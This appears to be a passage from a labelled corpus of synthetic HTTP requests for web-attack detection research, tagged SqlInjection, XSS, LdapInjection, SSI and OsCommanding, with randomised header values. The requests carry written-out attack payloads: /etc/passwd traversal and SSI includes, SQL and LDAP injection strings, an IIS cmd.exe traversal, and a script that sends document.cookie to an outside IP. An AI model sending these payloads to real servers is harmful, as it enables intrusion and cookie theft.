rA0lv0ioiwo=466973&yenixaduelI=tI85xsctohURai7&Iaa=6ASJjYFXG&insertcPAfUS=79&4hgaeeaauaunei=\l&ecmdcp49R=\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/passwd%00.html&ed4uhokf=etnlss  ?8ct Q ss&J7xmlyw7=1405270&Sbiqeldscto=i-&o8Gbiyil5eba=trsTmrenuc&srnixnt=50678858&ega=eVKUnIt&oeev=iWEdo30&r1pm5tet6e=TAebww0irltcxxea

End - Id: 46097
Start - Id: 42401
class: SqlInjection
GET /rhSallechon/trqbHm@_UFees/i6kBnlc_eO0vKQ1KN/xsn7jiOalo/jSk/BQS_B@pBk/goTkajagdOle.php4?uUVs%uanAZ=nmaalsHfdto&1ai3elrtxpd=918272&8seRuhonr=542103753&eaesty6a=etxpgunionluaRIm1wp-&r8p6eiz0ealon=OR++7770519%3E81522336&repms=dg6F&e0=oJc8V.2C&eor7khniro=1&ii=72&21B4=yy+in&imlxtpQa=pzbElprtnszgr5&lyd4=ObtNigfIo6Iob HTTP/1.0
Host: 89.214.125.43
Connection: dvseh
Accept: application/postscript
Accept-Charset: macintosh;q=0.5, x-mac-ce, euc-cn;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=5
Client-ip: 27.25.131.119
Cookie: xoxI=s;pt8jfbrn=wnlhalnve77rlr;R0t6Enc1aiori=0dD>eet s|/LneuousteC;i0KrddNsmt=609248223;ddbailtatjoinnr=AeedSieynbtghemn;Nssm1eondvz=o9 1t(ne((t -
Cookie2: $Version="12"
Date: Sun, 16 Jan 05 02:19:27 CET
ETag: "Ih__Fx4k.oUhLqaWav7"
Expect: 100-continue
From: aespw@dgaxhlomnn.it
If-Modified-Since: Sun, 18 Mar 07 10:37:17 GMT
If-Unmodified-Since: Sat, 15 Aug 09 06:47:05 GMT
If-Match: *
If-None-Match: "s8MqG@JQ9iKzuWDb4I2"
If-Range: *
Max-Forwards: 2178
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: JslOti auhh=xthke
Authorization: Digest nc=fdBBaf51
Range: -4,92807-997,-01613
Referer: http://www.saEhi.fr/d9tt/es7tyt.pdf
TE: chunked;q=0.7
Trailer: Host
User-Agent: Mozilla/9.6 (X11; U; SunOS sun4u 4.7; zt-sc; rv:4.4.2) Gecko/55967456
UA-CPU: StrongARM
UA-Disp: 156,101,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 3589x325
Via: 0.4 www.wnylltk.htm
Transfer-Encoding: compress
Upgrade: Cuscnt/3.0
Warning: 630 www.qHomhe.tiff "xvqr" 
X-Forwarded-For: 120.46.59.231
X-Serial-Number: 67876
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 42401
Start - Id: 35098
class: SqlInjection
GET /trDDDr./n@t/RD0heXmeta/mebehejedneTamdlsS/jue/H4_DmJgQs7/anjlgTGFpwvm/lTiDcgdn1hanLmnoo/echoUmMLso_/snOee.png?naizlg9poow=51688285&0tUle2ial=vnaUlosegh9t&nnr7=emnrr2dij8Dkrmhs HTTP/1.0
Host: www.m6rdf.uk:677
Connection: 5eerumV
Accept: */*
Accept-Charset: windows-1258
Accept-Encoding: gzip, deflate, identity
Cache-Control: no-cache
Cookie: t1r=Eoraeluiuoh;srraAAeftt=' AND  USER_NAME()='ds
If-Range: Wed, 27 Feb 08 17:50:03 UTC
Max-Forwards: 644
Pragma: no-cache
Referer: http://Viwon.org/h2re.exe
TE: trailers,deflate;q=0.7,chunked;q=0.2
User-Agent: ref.2UGrv http://www.hkdi.com
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35098
Start - Id: 46974
class: XSS
GET /jfZ7Z.j@oLJrB4/CTQetcj_rAevalde/i.vFS/ixtpi-Pm/rF6vo3j4iEMck/Baqz7U/Oaswet4irejIe.sh?ueu0hddhMwvryr=er1s&ttee7lay=%3Cimg+src%3D+%22livescript%3A%5Balert++%28%27ettr%27%29%3B%5D+++++%22+++%3E&5cchewWeidb=s%3A-adminld HTTP/1.0
Host: www.nicrn.fr
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: gzip, gzip, identity;q=0.0, compress
Accept-Language: *
Cache-Control: no-transform
Client-ip: 28.22.243.204
Cookie: jttAi=19602;am=gP6kK;P54NOqhOwget8eY=82jr-ytZDWEP;ute4t=8xhIXArvL_
Cookie2: $Version="8"
Date: Thu, 29 Jun 06 11:47:42 GMT
ETag: "h@Zbg9WOjH7q9a0GDxE"
Expect: lirmAu=bfd2
If-Modified-Since: Sun, 15 Oct 06 13:53:38 CET
If-Unmodified-Since: Thu, 18 Oct 07 22:16:30 CET
If-Match: *
If-None-Match: "xuCeH@Vw4RVR34kI@Y8"
If-Range: *
Max-Forwards: 59
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: NTLM dERkdGN0N2RobWhKb2VoY2M1dXJ1ZWlpaXNXenVuYTZoMGM=
Authorization: NTLM cnRkc2xvb3dwZHJqNXJlb3RlczJvd3BvdGRzbm5ncHZhc1RhdWFm
Range: -299,87-,670-62
Referer: /shlncO/Seirvipe/eensdert/Ioeeol6.mdb
TE: deflate,deflate,chunked;q=0.0
User-Agent: Mozilla/8.1 (Machintosh; U; Mac OS X 9.2; ta-1t; rv:8.5.5) Gecko/11155549
UA-Disp: 2976,173,32
Via: FTP/6.1 10.144.201.252, ve38li/3.2 www.besdtn.tiff
Transfer-Encoding: compress
Upgrade: 4il/0.7, 4aTrnW/6.9, 7fuM/5.0, sih/2.0
Warning: 851 www.iRa0dmoc.js "OTesetongilrtiwreAm" 
X-Serial-Number: 68033116014
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46974
Start - Id: 37744
class: LdapInjection
GET /havingq_sSlpwZD/bmLQjV5P/aPedidn3/ood/tAPhbLn9GVGfbPTrj/iMTe5L.jpg?wgetXT.jW@Vn-=dueh7byrupdateen&dei=%29+++%28%7C++%28+++cn%3D*o+%27brien*+++%29%28mail++++%3D*o+%27brien*++++%29++++ HTTP/1.1
Host: 194.194.37.55
Connection: qtetTttw
Accept: audio/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: rhzyee-i3O;q=0.3, 1lnI5ao-IAsushh;q=0.4, e-ax, neci-dar
Cache-Control: max-stale
Client-ip: 214.57.144.226
Cookie: syaa=e_Cma-XwqhbJ;iroho8uliy7Hu=saioiacceptmiz;rfmreoiwc0dli=4;fLiejoeiroto5pa=ceqnph-;hi=sNqNXx9CU;mwen7=9698
Cookie2: $Version="6"
Date: Fri, 24 Nov 06 11:49:57 UTC
ETag: "O7n8cheml6sy0-OowP8"
Expect: 100-continue
From: ft5sbsfs@ttt1ze.uk
If-Modified-Since: Sun, 07 May 06 02:23:23 CET
If-Unmodified-Since: Wed, 12 Mar 08 01:36:00 UTC
If-Match: *
If-None-Match: "Yd2TSivJu2g5OMVR7"
If-Range: Mon, 21 Dec 09 23:37:20 UTC
Max-Forwards: 147
Pragma: ntps=s0ei
Authorization: Basic YWx0ZHJtMzpwOXJoY2Fpcw==
Range: 3-,-470
Referer: http://eeriorh.fr/tmr5n/nn1be5ei/snrorEj/ah4eimtt/seeaseht.jpeg
Trailer: Warning
User-Agent: eilsjttdymu
UA-CPU: MIPS
UA-Disp: 242,7372,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 842x443
Via: 5.6 www.felwCer.htm, 4.6 57.174.87.134:7512
Transfer-Encoding: deflate
Upgrade: esS/4.5, qssn/5.3, wig/2.0
Warning: 397 www.estmthgu.jpeg "iqcdxmusey4i3" 
X-Forwarded-For: 33.253.224.201
X-Serial-Number: 3350612
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37744
Start - Id: 39795
class: SSI
GET /73ePRHFnMQoC6j/oEtocHMppGrdrpRlenc/oILbyZJj/etstaW1.php?AYG0F6to%ukqv=%3C%21--++++%23include++++virtual%3D%22%2Fetc%2Fpasswd%22+++--%3E&nt=73&8NwbBHFsock_stream=u%2BbbocopysEunion%3Dz&uyOgnraramee=mqrhj&eatbenReu=enthiaasrmochaktpet9&G@sock_streamZr_3AliketOO=tZ871%40ggu5- HTTP/1.0
Host: 83.201.113.120:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: nmlgTB7-k;q=0.1, e-alPeel
Cache-Control: no-transform
Client-ip: 129.26.179.125
Cookie: Zi_6binMcAg=432;ehgneeet6=elnetcsnstr-eu
Cookie2: $Version="9"
Date: Sun, 20 Sep 09 07:17:08 UTC
ETag: "1MI3X5pRIo3ZW19eTlb1"
Expect: 100-continue
From: otit3le@ijlhneot1o.com
If-Modified-Since: Mon, 29 Aug 05 21:29:12 GMT
If-Unmodified-Since: Tue, 17 Nov 09 06:53:04 CET
If-Match: "bHJKkxda8xbD6vUFfSP"
If-None-Match: *
If-Range: "JZV1muKv98Sl-si9B"
Max-Forwards: 6335
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Digest nc=Ca5d26eD
Authorization: Digest uri=http://www.wrOk.net/hoodei/i9fdm/hosOp8.rar
Range: -141,0-,96-
Referer: /Jijebi3t.txt
TE: gzip;q=0.7,trailers,gzip
Trailer: Upgrade
User-Agent: Armdynrr/9.9
UA-CPU: Sparc
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 468x7869
Via: HTTP/6.3 www.tiCo8.jpg, apsspd/3.6 230.233.79.136, 0.6 99.76.109.82
Transfer-Encoding: gzip
Upgrade: oLt/5.9, tEgb/6.9, 6laet/2.7, faare2/0.4, vst20/6.5
X-Forwarded-For: 197.171.250.97
X-Serial-Number: 39977076241136
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39795
Start - Id: 35204
class: SqlInjection
GET /dOso/t90mkFW/ftEoieSurhense7lx/sRFgm7@IRUQ8HKWd/09e6SDbe/8fpkOrz.jpeg?sosei=lbineD4ksez&niu=9211926&qlrTcsejbosih=otea8finsertnEt%3A&esiwR=23836&IYjT5Mwrj=fs%24nusy8sot%3Betseu&wsef=3584&rolanenub=-home-&wvZK9cq=chphpa&cg@0Lss3XCE=0083330&6nnnI3je=OR++++%27oScgVl2eii%27+++++IN++%28++%27++%27++++%29&RXAr=%3Copenw&5yPZY--oKA0a=5gw0iTvo8&telnetntGOwELdz2e=491883085&znpaYlptrall=5118 HTTP/1.0
Host: 1.133.220.172
Connection: close
Accept: audio/*;q=0.9, application/x-tar;q=0.8
Accept-Charset: *
Accept-Encoding: deflate
Accept-Language: *;q=0.2
Cache-Control: min-fresh=21297
Client-ip: 142.201.79.191
Cookie: twnrsane9=oE2en761ontr;mtryrwF=993;eoannoopeq=dFxH;xsC= 2+hNo;tuuA=886
Cookie2: $Version="8"
Date: Fri, 25 Dec 09 13:46:16 GMT
ETag: W/"LM@OO5twrv6vOD3z@"
Expect: 100-continue
From: 1sbtaan@lile.com
If-Modified-Since: Fri, 05 Oct 07 02:49:27 GMT
If-Unmodified-Since: Sun, 15 May 05 21:00:49 CET
If-Match: "mljvsz-0FOdenSPh"
If-None-Match: *
If-Range: Fri, 04 Jan 08 08:25:06 CET
Max-Forwards: 667
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: NTLM b3NTZXA0YW5uT3REdXlBYXlvdG90ZTE3OG9tYWhnaWNlc2F3b3R0eXkzaGVyaQ==
Authorization: NTLM ZTBkblJjaWhoZ251Z2VyaTF1N2FsanZkMG53dGZzZW93Y2hyaWNF
Range: 786796-,-020
Referer: http://www.ootn.cz/hcpig/aNauei.mp3
TE: trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/2.1 (X11; U; Linux i386 6.3; on-Re; rv:5.5.1) Gecko/80709783
UA-CPU: Sparc
UA-Disp: 601,1500,16
UA-Color: color32
UA-Pixels: 0990x1742
Via: AoiaH/8.5 www.jmbewe.htm, radkp/7.2 www.naaMsp.css, 9.8 www.Kiihi.html
Transfer-Encoding: identity
Upgrade: iLscp/4.9, oDeea/6.1, i1o/0.9
Warning: 562 145.202.157.174 "Eninnaeeoatl9O4t" "Mon, 02 Feb 04 01:35:42 GMT"
X-Forwarded-For: 79.157.98.85
X-Serial-Number: 653794992925901
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35204
Start - Id: 37380
class: LdapInjection
GET /hmM7wV/ejIltzt/0Szr23.vi/nhsb0fmrvupteue.htm?yiioTct=5137991167&fgfbEt9devaw=9338&srituhs=vpmS_WMFJ1&dwhdhnebooidoma=9010171624&xEda=14631&qa=t%3F+icatbl%3Cdeleteyea&naisl5s=3&or=saa6&m9oqnoat=5divr&y2n=livrt&zeeppHl=lD0eNikRQ&Tebhn=5b&rIaaa6kial3ager=42 HTTP/1.0
Host: 250.144.65.125
Connection: Rreonrm
Accept: */*;q=0.0
Accept-Charset: *;q=0.0
Accept-Encoding: compress;q=0.6, gzip;q=0.6, compress, identity;q=0.3, deflate
Accept-Language: OTUagdt-aeieaa5, To2-fTk1phnm;q=0.0, HnrdlniA-r;q=0.9
Cache-Control: max-age=04
Client-ip: 98.165.130.171
Cookie: DmNGvMeoDt8@=5vYPa2Ldg_d;mhds=5
Date: Sun, 15 Aug 04 07:48:47 UTC
Expect: ioma6w
From: rantutaO@slU8aeire.ch
If-Modified-Since: Sat, 27 May 06 16:09:23 UTC
If-Unmodified-Since: Fri, 23 Dec 05 10:17:58 UTC
If-Match: *
If-None-Match: "zuxrj.GFYGkf1@3DMQ-N"
If-Range: Sun, 13 May 07 19:31:05 CET
Max-Forwards: 3
MIME-Version: 7.0
Pragma: h='ag55'
Proxy-Authorization: n7te1l piFs=eoleIi1
Authorization: Digest opaque="uiel"
Range: 059445-,841-
Referer: /zutiTwt.msf
TE: gzip;q=0.1,trailers,trailers
Trailer: Range
User-Agent: )    (|(displayName=had*)    (name    =    had*    )(    mail=had*    )
UA-OS: Windows 95
UA-Pixels: 040x3163
Via: 1.8 191.79.172.220:205
Transfer-Encoding: deflate
Upgrade: oth/1.4, eoZf/2.8
X-Serial-Number: 71830
----: ---------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 37380
Start - Id: 47547
class: XSS
GET /-rajp6jSO2/l1ih/aJa/Ztmp7ahomephpF2Z1r/sjqHipnheIFFYLX4Rfiy/0nttloecclzEhhnze/f2/oeeAnEoAjhovi4/g8pahXfcT0wVP/defkkqbitsiagcn.tiff?MC3RYvar_=%3Cxml+++src+%3D%22++javascript%3A++%5Balert+++%28%27iSaratvDp%27%29%3B%5D%22++%3E&imatt=tir&Xttmpk8y@lgp=ei%29hohiee&ree4remuOi=40753&iNasnli6Ute=84pM&mtonstrpuro=xWZBHU&5Enr=06163&ttfrwhoev=var%3Ctlnss&sO9b8lpyS_5=901690&dbesybek=964620&o0Pm=r%2B&osude14egg=%3Dtrri++%27&fgT3.T=3931&pJURPei06m=td9nmcBad HTTP/1.1
Host: www.rpatesro.cz:80
Connection: s4Tpna
Accept: video/*;q=0.5
Accept-Charset: *;q=0.8
Accept-Encoding: gzip;q=0.3, identity;q=0.8, gzip;q=0.3, compress;q=0.0, gzip
Accept-Language: ms-usag
Cache-Control: n='hgj'
Client-ip: 114.185.152.231
Cookie: r1vb=dMx@0jzgk;7dn09en=zi2fo;ieYisek4=433676;ssyEntzp4r=qpMtfgUvhxz;n9eT0e=prHLat5wtrhUDg;etii=cmT5aii4jeg0o
Cookie2: $Version="8"
Date: Tue, 30 May 06 24:48:34 CET
ETag: ".hOL6y3DPe6aw9Q5di1"
Expect: 100-continue
From: ilyylhh@tttqt1htr.biz
If-Modified-Since: Mon, 21 Sep 09 24:29:51 CET
If-Unmodified-Since: Sat, 25 Oct 08 14:30:16 CET
If-Match: *
If-None-Match: "nlPvheeUYn6NMvD."
If-Range: Fri, 06 Jul 07 20:31:04 GMT
Max-Forwards: 5310
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Basic b2FuMDp0dG9jc2lj
Range: 35190-213,56187-
Referer: /et3tt/erlT/2wvr/hseiy.doc
TE: gzip;q=0.8,trailers
Trailer: If-None-Match
User-Agent: Mozilla/6.7 (X11; U; Linux i586 6.5; us-o6; rv:2.1.4) Gecko/71188478
UA-CPU: PowerPC
UA-Disp: 050,2452,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 2187x3503
Via: HTTP/3.0 245.57.233.254:3034, fsm4/8.0 www.oclhx.tiff
Transfer-Encoding: rqbcIi; ntkntoee=ioid
Upgrade: nqne/3.2
Warning: 992 177.149.214.21:27 "ihta" 
X-Forwarded-For: 112.231.125.157
X-Serial-Number: 57604389
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47547
Start - Id: 42301
class: SqlInjection
GET /8ricMM5HN39/aQlibRlsmail9LbPZ.php?lDDZeQ=%27UNIONALLSELECTfieldFROMoldensenWHERE%27%27++++%3D++%27&0eEUZOe=tpassthruOiee HTTP/1.1
Host: 225.12.23.77
Connection: 1m5and
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: identity, gzip, compress;q=0.9, gzip;q=0.3
Accept-Language: sxmvni2p-1nisct;q=0.0
Cache-Control: no-cache
Client-ip: 43.137.232.139
Cookie: csTJees=ms nandfT$passwdoet rIhE;Ee0hoe=h0UiFFJ1;ia5tl=oA1vcTLjQ6Vr
Cookie2: $Version="5"
Date: Wed, 25 Apr 07 08:09:41 UTC
ETag: W/"17F1n2q6q2So7mxf"
Expect: 2bjxcs=wsw3;ntaora=E4Oor
From: ebsew@sn8ns6e.de
If-Modified-Since: Sun, 19 Apr 09 01:42:23 CET
If-Unmodified-Since: Sun, 04 Nov 07 22:26:31 CET
If-Match: "XR95AKITPzx2v@3i"
If-None-Match: *
If-Range: Mon, 11 Dec 06 23:14:20 CET
Max-Forwards: 4445
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: b2tam rguj=eenzIhf
Authorization: Digest nc=68fbdecc
Range: -568889,-588214
Referer: /nimesj/UieaEE/ueoe7hoe/5ilteers.asp
TE: gzip,trailers
Trailer: If-None-Match
User-Agent: Mozilla/1.4 (X11; U; SunOS sun4u 2.2; ph-er; rv:8.5.5) Gecko/74293399
UA-CPU: Sparc
UA-Disp: 695,8049,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 5338x078
Via: 8.9 www.sdre.tiff, FTP/5.4 www.6e7ilX4i.jpg
Transfer-Encoding: compress
Upgrade: i7iya/1.9, iT3ylo/7.2
Warning: 720 www.EuHgp.tiff "rnts" 
X-Forwarded-For: 74.6.222.203
X-Serial-Number: 807714416153290560
----: -------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 42301
Start - Id: 47147
class: XSS
GET /vmmm/9orGR7VGLCN52N/miterqCltAlfr/ftaopaimfiUonustT3r.shtml?_Bm.=%26%3Cscript+%3E%5Bwindow.open%28%27http%3A%2F%2F157.166.62.91%2Fieon.swf%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript+++%3E&9duLomvsiooit=nu91s8mwu&nh9tb=Obdhomea%5DIwp-eoee&sh2otHohb=sJ.&intftAeejymm=3681303123 HTTP/1.0
Host: www.yqrojikT8.st
Connection: keep-alive
Accept: audio/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: min-fresh=2
Client-ip: 13.138.53.141
Cookie: sVd=c56tt;nivvrdoo=0;pelioteU=9106341840
Cookie2: $Version="5"
Date: Sun, 03 Aug 08 11:45:46 GMT
ETag: W/"h8GIdQBR_P5h.4Cev5X"
Expect: tnrpsa=tPsspxH
From: xeliaGtt@ccieug.de
If-Modified-Since: Fri, 24 Aug 07 17:42:58 CET
If-Unmodified-Since: Fri, 06 Oct 06 15:10:52 UTC
If-Match: *
If-None-Match: "Bk@IKxqGEnEQMGu.e"
If-Range: "jJzAUVFXaY6WV9J_Gu"
Max-Forwards: 472
MIME-Version: 6.6
Pragma: oex=8imwuea
Proxy-Authorization: Digest response="A354AfF913f0aEf3F0CAdDFBA4c0E2c5"
Authorization: Basic aXVkZFQ6dUxsMTZi
Range: 9848-585788,73810-,9-
Referer: /rec4an/hwnOiLil.gif
TE: trailers,gzip,chunked;q=0.0
Trailer: Cache-Control
User-Agent: x760ypkyz http://www.eeahstw.org
UA-CPU: 68000
UA-Disp: 2636,076,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 6020x621
Via: HTTP/6.3 www.2e80n4.png, 1.0 119.140.135.114, HTTP/1.5 www.teed.htm
Transfer-Encoding: deflate
Upgrade: see/0.0, ujnd/2.6, afee/4.4
Warning: 339 51.64.209.7 "6Kirtt2tetFxoo" "Fri, 17 Oct 08 02:00:42 UTC"
X-Forwarded-For: 77.180.133.237
X-Serial-Number: 54001451967
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47147
Start - Id: 39666
class: SSI
GET /ex2opscFFSIbncKYn3/ecbrlGt2F3PT0OS_/rSr.msf?9jimgapzhs=D3se&DUoEE0F9L=x%25ess-d%7E5s&iwpecA=%3C%21--++%23include++++virtual%3D%22%2Fetc%2Fpasswd%22++++--%3E&J0aeLjI.SzNYi=oxphp+&m3hS2=k&ds=62394440 HTTP/1.1
Host: 250.224.189.62
Connection: keep-alive
Accept: application/rtf, audio/basic;q=0.7, video/mpeg
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: 0-ttTs;q=0.3, eenSoiih-tStesgto;q=0.1
Cache-Control: min-fresh=59
Client-ip: 1.35.61.145
Cookie: rrzpsODcaee=g7xy_e@kjP;ehvhayi=ci3kryne2eni;a@B-5Z3Nz8A=eedij;ekzQ=465
Cookie2: $Version="0"
Date: Fri, 12 Sep 08 18:41:31 UTC
ETag: W/"@SqQ0wgGgYvjaSt"
Expect: Nt5znH=tdnfAI4n
From: l5vtEst@R8caTefna.fr
If-Modified-Since: Sat, 07 Jun 08 24:27:44 GMT
If-Unmodified-Since: Sun, 03 Dec 06 20:49:11 UTC
If-Match: "B@3VoxY.xDKOy5mo"
If-None-Match: "GNA9-AmAhp8X3WPux9"
If-Range: *
Max-Forwards: 977
MIME-Version: 9.9
Pragma: msrirae='rt1yfe'
Proxy-Authorization: n0eu ard9hoW=9os6s
Authorization: NTLM dzB0Ym9vZnJlb3RuZ3NlMm5kb253bnNpbWhMbmU0ZG9zbGRieWlpZGthMWl5dw==
Range: -7190
Referer: /rnCyE.png
TE: chunked;q=0.6
Trailer: Accept-Language
User-Agent: Mozilla/7.8 (compatible; Konqueror/1.6; Linux i386; 5neorpkL)
UA-CPU: PowerPC
UA-Disp: 9927,407,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 8969x195
Via: FTP/3.7 www.dxeetn.gif, 4.5 68.130.56.226, FTP/6.8 www.bsth.shtml
Transfer-Encoding: q0ttU; 8Rse6n=hncotdey
Upgrade: keeao/1.8, ytF/7.1
Warning: 273 www.Sneje.htm "srzSNAitebchch" "Mon, 20 Dec 04 23:29:19 UTC"
X-Forwarded-For: 166.133.168.205
X-Serial-Number: 977032665970
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39666
Start - Id: 44317
class: OsCommanding
GET /scripts/..�/../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 119.217.84.94
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 150.122.198.96
Cookie: 8ypeorhoretns=6;yPHphpscript=q8_IB;uimgbIxSNxhTV=29;9NHinnOFg=tB5
Cookie2: $Version="30"
Date: Thu, 27 Jan 05 08:11:13 CET
ETag: "8n0SdKaafzTrTySu-@"
Expect: 100-continue
From: ssaaei@srTei5is.de
If-Modified-Since: Thu, 04 Oct 07 09:21:16 CET
If-Unmodified-Since: Sat, 02 May 09 03:46:53 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 17
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: NTLM cDRuYWFMbnRlZWxjZWFnbzdtZWVvcm5tb2hrY2VobXJiZG9z
Authorization: Digest response="1dFb11EaFADBAFa04b6C8a388edCDdc3"
Range: -2
Referer: http://www.ftqg.net/t0eh/ooyy/uhnatxla/oongLer.mpeg
TE: trailers,trailers,chunked
Trailer: If-None-Match
User-Agent: Mozilla/7.5 (X11; U; SunOS sun4u 5.6; mh-id; rv:1.2.7) Gecko/46084158
UA-CPU: PowerPC
UA-Disp: 9070,4804,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 5984x276
Via: HTTP/7.9 25.123.36.239
Transfer-Encoding: compress
Upgrade: ott9i/7.1, tei/4.6
Warning: 284 www.natmB.jpeg:92644 "Hmt9" 
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 7359375071
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44317
Start - Id: 35229
class: SqlInjection
GET /plaEi1msr4hueo9/sAieddreo6dAen/yacceptZobjectK5Ib/bCXayctnmKTn_Ar/4W/em/rsatiNmPtn/kuArm7p8aoeedciheb/clxbMCxDhn5sGWID6x@/Lp_BXWnph-sLC/nastaIu9oihtto.jpg?agibasvpdhoo=OR+++81904%3E2223845017 HTTP/1.0
Host: www.seajNe.be
Connection: keep-alive
Accept: image/*, video/quicktime, text/*;q=0.1
Accept-Charset: iso-8859-6, iso-8859-4;q=0.9, windows-874, windows-1252
Accept-Encoding: identity
Accept-Language: *
Cache-Control: no-cache
Client-ip: 77.106.13.151
Cookie: sgv9d6cmnd=swci4syii;dhmooo=9319656;bwstcno=exi
Cookie2: $Version="3"
Date: Sat, 18 Feb 06 21:27:33 CET
ETag: W/"bFb127kl2ale7r@.kL9"
Expect: 100-continue
From: oeeetot@ecjsbsx.org
If-Modified-Since: Sun, 12 Dec 04 07:31:08 GMT
If-Unmodified-Since: Sun, 12 Apr 09 02:40:15 GMT
If-Match: "i22JZk1gkOPbluxUnaU"
If-None-Match: "FrM9gcMispPKjG-cy"
If-Range: Tue, 30 May 06 20:09:39 UTC
Max-Forwards: 3
MIME-Version: 1.4
Pragma: sbted='gain'
Proxy-Authorization: NTLM ckxzMmNvTjBuaGVjb2FldGlzYWFOZGFhMDdtbnNuOXNl
Authorization: Ng2eEW jwwi2aA=tNdexeg
Range: -2,109-7
Referer: http://XNbg.ch/dglmoes/3twpe.txt
TE: chunked,chunked
Trailer: Accept-Language
User-Agent: znuu (t9ab8Iby; sbBynDl)
UA-CPU: Sparc
UA-Disp: 1181,695,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 0990x1742
Via: 4.1 62.88.136.193:74, 3.6 228.185.98.139, wee/3.2 www.aw0eh.htm
Transfer-Encoding: deflate
Upgrade: doyt/0.4, bE3yw/1.4, otunr5/6.9, 62V/0.3, trd9ad/7.6
Warning: 389 www.eetaIMn.js "i6iB7Cled" "Wed, 06 Jan 10 21:20:43 GMT"
X-Forwarded-For: 52.198.225.199
X-Serial-Number: 514695691907
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35229
Start - Id: 46927
class: XSS
PUT /mqbd1pR/r9jZfmQmEue/9yeohnAo/rwafneednc1hsb/aemyynat8/cb3UM6hgr/mCE1XTmftb@VcWn/h1neieeosNeu/nlibl@_DK4SmM/vhfivuctttcmuiq7/neikintethr/DOFMDdATmMm.tiff? HTTP/1.1
Content-Length: 228
Content-Language: c32tje,NilnoRe
Content-Encoding: gzip
Content-Location: /0boa/tTtht.fgf
Content-MD5: OG5BdDNpcnNhYXJvZWh0dQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 21 Mar 08 18:13:04 UTC
Last-Modified: Sat, 29 Dec 07 03:36:14 UTC
Host: 178.159.160.153
Connection: keep-alive
Accept: audio/x-wav
Accept-Charset: iso-8859-2;q=0.1, windows-1254, windows-874, windows-1251, x-mac-korean;q=0.9
Accept-Encoding: *;q=0.7
Accept-Language: hi-r;q=0.5
Cache-Control: no-transform
Client-ip: 233.117.50.11
Cookie: emeStTeOat=t6
Cookie2: $Version="688"
Date: Tue, 13 Jul 04 15:31:49 CET
ETag: W/"_uuPg0cLnphDTjTe"
Expect: 100-continue
From: HsznrM@xmaxp.fr
If-Modified-Since: Tue, 06 Nov 07 18:09:18 UTC
If-Unmodified-Since: Sun, 04 Jul 04 13:46:43 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 27 Nov 05 07:34:55 UTC
Max-Forwards: 37
MIME-Version: 9.1
Pragma: h3kpu='EAise'
Proxy-Authorization: Basic Y3RyWWQ6MnR0Zg==
Authorization: Basic ZG1lY21jOm5pbHE=
Range: -790
Referer: http://arodrbro.st/u6IO/tere1/kcfo0.sh
TE: chunked,deflate,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/1.9 (compatible; MSIE 1.1; Unix; eEwma; i7bihf0)
UA-CPU: MIPS
UA-Disp: 4346,951,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 537x7894
Via: FTP/9.9 243.178.152.236
Transfer-Encoding: gzip
Upgrade: sdW/7.9, agrd/5.9, wt6wa9/7.2
Warning: 179 www.uasae.gif "peEehwtea6n8inr" 
X-Forwarded-For: 59.28.178.137
X-Serial-Number: 3374825125599046
----: ---------------------
